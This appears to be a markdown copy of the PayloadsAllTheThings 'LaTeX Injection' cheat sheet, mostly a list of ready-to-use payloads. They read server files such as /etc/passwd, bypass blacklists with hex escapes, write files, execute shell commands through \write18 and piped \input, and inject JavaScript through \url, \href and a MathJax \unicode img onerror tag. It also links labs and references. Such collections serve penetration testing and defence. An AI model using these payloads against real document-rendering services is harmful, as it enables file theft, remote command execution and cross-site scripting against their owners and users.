index.md (3921B)
1 --- 2 title: "LaTeX Injection" 3 topic: "LaTeX Injection" 4 topicSlug: "latex-injection" 5 sourcePath: "LaTeX Injection/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/LaTeX%20Injection/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # LaTeX Injection 12 13 > LaTeX Injection is a type of injection attack where malicious content is injected into LaTeX documents. LaTeX is widely used for document preparation and typesetting, particularly in academia, for producing high-quality scientific and mathematical documents. Due to its powerful scripting capabilities, LaTeX can be exploited by attackers to execute arbitrary commands if proper safeguards are not in place. 14 15 ## Summary 16 17 * [File Manipulation](#file-manipulation) 18 * [Read File](#read-file) 19 * [Write File](#write-file) 20 * [Command Execution](#command-execution) 21 * [Cross Site Scripting](#cross-site-scripting) 22 * [Labs](#labs) 23 * [References](#references) 24 25 ## File Manipulation 26 27 ### Read File 28 29 Attackers can read the content of sensitive files on the server. 30 31 Read file and interpret the LaTeX code in it: 32 33 ```tex 34 \input{/etc/passwd} 35 \include{somefile} # load .tex file (somefile.tex) 36 ``` 37 38 Read single lined file: 39 40 ```tex 41 \newread\file 42 \openin\file=/etc/issue 43 \read\file to\line 44 \text{\line} 45 \closein\file 46 ``` 47 48 Read multiple lined file: 49 50 ```tex 51 \lstinputlisting{/etc/passwd} 52 \newread\file 53 \openin\file=/etc/passwd 54 \loop\unless\ifeof\file 55 \read\file to\fileline 56 \text{\fileline} 57 \repeat 58 \closein\file 59 ``` 60 61 Read text file, **without** interpreting the content, it will only paste raw file content: 62 63 ```tex 64 \usepackage{verbatim} 65 \verbatiminput{/etc/passwd} 66 ``` 67 68 If injection point is past document header (`\usepackage` cannot be used), some control 69 characters can be deactivated in order to use `\input` on file containing `$`, `#`, 70 `_`, `&`, null bytes, ... (eg. perl scripts). 71 72 ```tex 73 \catcode `\$=12 74 \catcode `\#=12 75 \catcode `\_=12 76 \catcode `\&=12 77 \input{path_to_script.pl} 78 ``` 79 80 To bypass a blacklist try to replace one character with it's unicode hex value. 81 82 * ^^41 represents a capital A 83 * ^^7e represents a tilde (~) note that the ‘e’ must be lower case 84 85 ```tex 86 \lstin^^70utlisting{/etc/passwd} 87 ``` 88 89 ### Write File 90 91 Write single lined file: 92 93 ```tex 94 \newwrite\outfile 95 \openout\outfile=cmd.tex 96 \write\outfile{Hello-world} 97 \write\outfile{Line 2} 98 \write\outfile{I like trains} 99 \closeout\outfile 100 ``` 101 102 ## Command Execution 103 104 The output of the command will be redirected to stdout, therefore you need to use a temp file to get it. 105 106 ```tex 107 \immediate\write18{id > output} 108 \input{output} 109 ``` 110 111 If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`): 112 113 ```tex 114 \immediate\write18{env | base64 > test.tex} 115 \input{text.tex} 116 ``` 117 118 ```tex 119 \input|ls|base64 120 \input{|"/bin/hostname"} 121 ``` 122 123 ## Cross Site Scripting 124 125 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 126 127 ```tex 128 \url{javascript:alert(1)} 129 \href{javascript:alert(1)}{placeholder} 130 ``` 131 132 In [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html) 133 134 ```tex 135 \unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">} 136 ``` 137 138 ## Labs 139 140 * [Root Me - LaTeX - Input](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Input) 141 * [Root Me - LaTeX - Command Execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution) 142 143 ## References 144 145 * [Hacking with LaTeX - Sebastian Neef - March 10, 2016](https://web.archive.org/web/20260209043241/https://0day.work/hacking-with-latex/) 146 * [Latex to RCE, Private Bug Bounty Program - Yasho - July 6, 2018](https://web.archive.org/web/20210117203905/https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) 147 * [Pwning coworkers thanks to LaTeX - scumjr - November 28, 2016](https://web.archive.org/web/20161130151956/https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)